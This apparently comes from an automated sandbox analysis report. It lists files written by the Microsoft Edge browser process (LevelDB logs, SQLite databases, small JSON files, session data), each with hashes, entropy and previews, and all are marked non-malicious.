                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):324
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.155406525785384
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9ZQL+q2P923oH+TcwtrQMxIFUt8M6f9jiG1Zmw+M6f9BiQLVkwO923oH+TcwJ:of7Q+v4YebCFUt8xfYG1/+xfLiQV5LYM
                                                                                                                                                                                                                                                                                                                                    MD5:8D21DAC1106A6F00BE416D6F553E3903
                                                                                                                                                                                                                                                                                                                                    SHA1:1DADDE4CB0644C812EC7985A5BEBCE7F3B192127
                                                                                                                                                                                                                                                                                                                                    SHA-256:7A8EBC3BE345D8A78012FEA6AD5B35102526073CF9087D29AB09E6F6475CEDA0
                                                                                                                                                                                                                                                                                                                                    SHA-512:785FDDF47E18F3A25BCC8E99D91C6E93D07C86230E63B64293624F2E76CCDD4F377081C57A30468E4E765242F1591E8DA7AE20203BEAF1E7C369091102B14E27
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.489 119c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/31-03:46:26.491 119c Recovering log #3.2024/12/31-03:46:26.497 119c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1443
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.8205439721662566
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:3IS2hMpRnwYm+bnyeQtGApsAF4unxHEtLp3X2amEtG1ChqZcrz6IYF9QKkOAM4:3z2hMLdkxzF3yLp2FEkChZnBDHOp
                                                                                                                                                                                                                                                                                                                                    MD5:235C4DDDE43EE99FDBAB331975B90409
                                                                                                                                                                                                                                                                                                                                    SHA1:ED9EB4E4A18DB862B8CAFFCCD847F8D383E0CE88
                                                                                                                                                                                                                                                                                                                                    SHA-256:5A968883ACA81FF70A8FCB6310D52D0BA4D451F9C9630AE6C66D82EC08CBF54E
                                                                                                                                                                                                                                                                                                                                    SHA-512:8FC7255378F46BCBCE2FC59B7AB4AE30D9B787D3476B9B27B945DD93020BC4B5E383748C0CAB4042DA507C3AB2C3E7088D49AC212ACC011C534B15F56C110C17
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SNSS.......r..S...........r..S......"r..S...........r..S.......r..S.......s..S.......s..S....!..s..S...............................r..Ss..S1..,...s..S$...31aa394c_1ba2_4531_83a6_7b33440ae671...r..S.......s..S.....e`........r..S...r..S.......................r..S....................5..0...r..S&...{98952893-68FF-4A5D-A164-705C709ED3DB}.....r..S.......r..S..........................s..S...........s..S........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x............*.......*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                                    MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                                    SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                                    SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                                    SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):352
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20088726743042
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9eT3+q2P923oH+Tcwt7Uh2ghZIFUt8M6f9e34Zmw+M6f9e3IVkwO923oH+Tcz:ofYTOv4YebIhHh2FUt8xfY34/+xfY3ga
                                                                                                                                                                                                                                                                                                                                    MD5:0A90933690F82C4E4F8C5F2DBC6A60A7
                                                                                                                                                                                                                                                                                                                                    SHA1:AC09C7166F0C270118294A47A3F74F69D8B3D619
                                                                                                                                                                                                                                                                                                                                    SHA-256:2C0A0AF1DF435BC7C3A09B61866DFFF80D10212ADB1733FC5415722204E51DC3
                                                                                                                                                                                                                                                                                                                                    SHA-512:7605A0E0146813D3413B70F3A309A6D59BD6DC8E09970B94BEBD4F804091EDFB65BEC54AB9AECF118B59393B040AA13DA3A3ECD9B68AF7813FA41095DCBD2E16
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.673 1098 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/31-03:46:25.676 1098 Recovering log #3.2024/12/31-03:46:25.676 1098 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):352
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.20088726743042
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:56f9eT3+q2P923oH+Tcwt7Uh2ghZIFUt8M6f9e34Zmw+M6f9e3IVkwO923oH+Tcz:ofYTOv4YebIhHh2FUt8xfY34/+xfY3ga
                                                                                                                                                                                                                                                                                                                                    MD5:0A90933690F82C4E4F8C5F2DBC6A60A7
                                                                                                                                                                                                                                                                                                                                    SHA1:AC09C7166F0C270118294A47A3F74F69D8B3D619
                                                                                                                                                                                                                                                                                                                                    SHA-256:2C0A0AF1DF435BC7C3A09B61866DFFF80D10212ADB1733FC5415722204E51DC3
                                                                                                                                                                                                                                                                                                                                    SHA-512:7605A0E0146813D3413B70F3A309A6D59BD6DC8E09970B94BEBD4F804091EDFB65BEC54AB9AECF118B59393B040AA13DA3A3ECD9B68AF7813FA41095DCBD2E16
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:25.673 1098 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/31-03:46:25.676 1098 Recovering log #3.2024/12/31-03:46:25.676 1098 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):270336
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                                                                    MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                                                                    SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                                                                    SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                                                                    SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.240538365410932
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:of6yv4YebvqBQFUt8xfU/+xf75LYebvqBvJ:RY4YebvZg8PLYebvk
                                                                                                                                                                                                                                                                                                                                    MD5:3FDF3E087133C3EE31614ED64701DA2A
                                                                                                                                                                                                                                                                                                                                    SHA1:D2700E97DF0D78F4CA785282CD3928A30225A0C0
                                                                                                                                                                                                                                                                                                                                    SHA-256:450438EED042E03B97570C26F9EFCE1D38809D84577B4E86313AA8AB628C8190
                                                                                                                                                                                                                                                                                                                                    SHA-512:215D566E1CC7CF185E9EEBDED4770E3A9075026203A947FC53F7E4170DB23799B10089A4E85AEF90D484688AD9DF3E23369F557632D4551CA8D17F818E4551A4
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.472 bd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/31-03:46:26.474 bd8 Recovering log #3.2024/12/31-03:46:26.480 bd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):431
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.240538365410932
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:of6yv4YebvqBQFUt8xfU/+xf75LYebvqBvJ:RY4YebvZg8PLYebvk
                                                                                                                                                                                                                                                                                                                                    MD5:3FDF3E087133C3EE31614ED64701DA2A
                                                                                                                                                                                                                                                                                                                                    SHA1:D2700E97DF0D78F4CA785282CD3928A30225A0C0
                                                                                                                                                                                                                                                                                                                                    SHA-256:450438EED042E03B97570C26F9EFCE1D38809D84577B4E86313AA8AB628C8190
                                                                                                                                                                                                                                                                                                                                    SHA-512:215D566E1CC7CF185E9EEBDED4770E3A9075026203A947FC53F7E4170DB23799B10089A4E85AEF90D484688AD9DF3E23369F557632D4551CA8D17F818E4551A4
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:26.472 bd8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/31-03:46:26.474 bd8 Recovering log #3.2024/12/31-03:46:26.480 bd8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:[]
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                                                    MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                                                    SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                                                    SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                                                    SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                                                    MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                                                    SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                                                    SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                                                    SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.264195915074418
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:of7I4Q+v4YebvqBZFUt8xf7IBG1/+xf7IcQV5LYebvqBaJ:dS4Yebvyg8aaJLYebvL
                                                                                                                                                                                                                                                                                                                                    MD5:3AAB93DFD99548D1A9E0E85496EE6422
                                                                                                                                                                                                                                                                                                                                    SHA1:48F76DEAE0FF61836DBC4A9AD052E894B91F76BC
                                                                                                                                                                                                                                                                                                                                    SHA-256:BC50FCAFCD3E6A54B86BD9296127A64D3243296292679747D93DA597394B919C
                                                                                                                                                                                                                                                                                                                                    SHA-512:D53C928AA2BD2EC09044139A5C5A36926FF929CCC206F52F4673026300A56328258A3FAF2BCE41C1D00F44695E5A3B2B9830D684CFABF9D482AD6A6186E1D308
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:2024/12/31-03:46:44.854 119c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/31-03:46:44.855 119c Recovering log #3.2024/12/31-03:46:44.858 119c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.264195915074418
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
